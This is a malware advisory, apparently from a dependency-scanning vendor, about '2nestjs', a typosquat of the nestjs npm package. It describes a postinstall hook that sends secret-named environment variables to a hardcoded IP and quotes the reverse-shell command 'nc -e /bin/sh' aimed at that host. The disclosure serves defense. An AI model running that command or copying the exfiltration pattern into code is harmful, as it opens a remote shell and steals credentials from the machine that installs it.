Malicious code in 2nestjs (npm)
MAL-2026-15911
Published · Modified
Dependency scanning
Check whether 2nestjs is in your codebase
Corgea flags malicious and compromised dependencies with reachability analysis, so you fix the packages that actually run in your application instead of working through the whole lockfile.
Description
__
Source: amazon-inspector (c9471c1fdd6ae99da48e44b8588f9e36814ce2859f2d25641b06cc53cf42174d)
The package's postinstall hook executes index.js, which enumerates process.env, filters keys matching /^(SECRET|API|TOKEN|KEY)/, JSON-serializes the matched values, and writes them over a raw TCP socket to the hardcoded remote host 84.32.22.44:9999 (loaded from servers.json). The same postinstall path also invokes nc -e /bin/sh 84.32.22.44 9999, establishing an interactive reverse shell to the same host and granting the remote operator arbitrary command execution on the installer's machine. The package's own package.json description labels it a typosquat of nestjs and the author identifier is typosquat-bot, and the module's export logs '2nestjs loaded -- targeting nestjs' — the package name is a numeric-prefix lookalike of the widely used nestjs package.
References
Ready to move
Start Securing
Free, no credit card | First findings in minutes